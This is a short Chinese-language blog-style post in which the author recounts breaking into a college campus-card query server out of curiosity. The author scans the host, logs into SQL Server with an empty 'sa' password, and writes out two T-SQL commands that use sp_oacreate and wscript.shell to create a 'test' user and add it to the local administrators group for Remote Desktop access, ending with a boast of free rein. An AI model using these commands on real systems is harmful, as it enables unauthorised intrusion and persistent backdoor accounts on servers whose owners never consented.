学院某服务攻击测试

yktxx.xxxx.edu.cn是学院一卡通查询的服务器,突然心血来潮,想检测下学院服务器的防御到底如何。还是习惯使用X-Scan这个老牌的检测工具。通过ping命令得到域名对应的IP地址,然后使用X-Scan检测,看着爆出的端口,135,1433,3389,心中暗喜,看来是Windows操作系统,且安装了SQLServer并开放了3389端口~~一般这样的配置很容易就会有SQLServer的sa空口令…果然不出我所料,X-scan不久提示发现sa空口令。。
DA060E0C583C84566F4CFB57F1DC96BA_500
下面就很简单了,看你想干什么了,首先我使用SQLServer的企业管理器连接到222.*.*.72,用户名sa 密码空~ok,这台主机上的所有服务器都出现在眼前了。翻查了下,没有多少有用的信息,那就进行继续入侵吧~
思路是通过Sqlserver的XP_SHELL添加一个最高管理员账号的用户,这样就可以使用3389连接到服务器上了,进行操作也很方便。说干就干,打开查询分析器,输入下面的命令:

declare @shell int exec sp_oacreate 'wscript.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user test test /add'

这样在目标主机上就有了一个用户名密码都为 test 的账户,下面我们把他添加进管理员组,执行:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup administrators test /add'

Bingo~~打开3389,输入test,test想干啥干啥吧~~